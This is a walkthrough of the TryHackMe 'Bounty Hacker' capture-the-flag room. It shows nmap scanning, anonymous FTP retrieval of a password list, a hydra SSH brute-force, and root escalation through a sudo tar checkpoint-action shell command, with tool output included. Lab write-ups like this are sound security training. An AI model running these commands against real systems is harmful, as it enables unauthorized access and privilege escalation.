This article is a write-up of the TryHackMe Room “Bounty Hacker”. I will explain my way of tackling this room and show you the solution that worked for me. No flags will be shown!
Link to the room: https://tryhackme.com/room/cowboyhacker
Difficulty: Beginner
Time: 15-30 minutes, depending on your knowledge
Table of Contents
Prerequisites
- Connect to the TryHackMe VPN and find your IP address
- Start the room and note the IP address of your server
I suggest you create a variable of the IP address in your terminal instance – This makes it easier to follow my guide.
export IP=SERVER_IPAll commands are tested on a „fresh“ Kali Linux installation. If you are using a different OS, you might need to change parts of these commands.
Task 1: Living up to the title.
You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they’d take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!
https://tryhackme.com/room/cowboyhacker
This room does not give you any time to prepare. You got drunk and boasted your hacking skills. Now you have to show them what you’ve got!
Question 1: Deploy the machine
This should be easy enough. Go ahead, start the machine and wait for the IP address to be displayed.
Question 2: Find open ports on the machine
The easiest way to check a remote server for open ports is to use “nmap“. In this case we can see three (3) open ports.
- 21 – FTP
- 22 – SSH
- 80 – HTTP
nmap -sC -sV $IP
┌──(dc㉿kali)-[~]
└─$ nmap -sC -sV $IP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-11 19:39 CEST
Nmap scan report for 10.10.247.146
Host is up (0.079s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.18.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.78 secondsQuestion 3: Who wrote the task list?
Two questions arise:
- Which task list?
- Where can I find it?
Let’s start by checking the website that is running on port 80.
Well… that does not look to interesting. Maybe there is a hidden directory? Let’s run gobuster to check for anything interesting.
gobuster dir --url http://$IP/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtWhile gobuster is doing it’s thing, lets look at the nmap scan again. Maybe we missed something?
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.18.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of statusThere is an FTP share with anonymous login! Let’s see what we can find on this share.
┌──(dc㉿kali)-[~/dailycompute/tryhackme]
└─$ ftp $IP
Connected to 10.10.247.100.
220 (vsFTPd 3.0.3)
Name (10.10.247.100:dc): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
Two files show up in the FTP share directory. We should download them and take a closer look.
ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.02 secs (3.8487 kB/s)
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.10 secs (4.1271 kB/s)
ftp> exit
locks.txt contains a list of random words that look like passwords. task.txt on the other hand contains a list of tasks and a username that is the answer to Question 3. At that point we can also stop gobuster, since we already have good idea of how to get in.
cat locks.txt
cat task.txtQuestion 4: What is the users password?
We have a username and a list of passwords. We also know from the nmap scan that there is SSH available on port 22. We should probably try to connect and check if one of the passwords might work. We could of course try every single password by hand, or we can use a tool called “hydra” to speed up the process. Hydra allows us to brute-force all combinations of the username and the list of passwords.
hydra -l username -P locks.txt $IP ssh
┌──(dc㉿kali)-[~/dailycompute/bounty_hacker]
└─$ hydra -l lin -P locks.txt $IP ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-11 19:49:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.247.146:22/
[22][ssh] host: 10.10.247.146 login: *** password: *******************
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-11 19:49:44Bingo! We have the password. Let’s answer the question and log in.
Question 5: user.txt
Once we are logged in we can just open the user.txt file and see the flag.
cat user.txt
THM{****************}Question 6: root.txt
To read the root.txt file we somehow need to escalate our privileges. First of all let’s check if we can use sudo:
sudo echo "hello"Sadly that is not the case. Next we can check if there is an executable that the current user can run with higher privileges:
sudo -lIt turns out that this user can run /bin/tar with sudo and without supplying a password. Maybe we can leverage this to gain root access? Let’s check GTFObins!
https://gtfobins.github.io/gtfobins/tar/
That’s helpful! Let’s try to use it!
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shThe result is a very minimalistic shell. Trying to use whoami results in an error. But if we try to read /root/root.txt…. There is the flag! SUCCESS!
cat /root/root.txt
THM{*******************}Conclusion
I hope you enjoyed this walkthrough. If you have any questions, do not hesitate to leave a comment. I will try to answer as soon as possible. Thank you for your time!
-DiddyRise
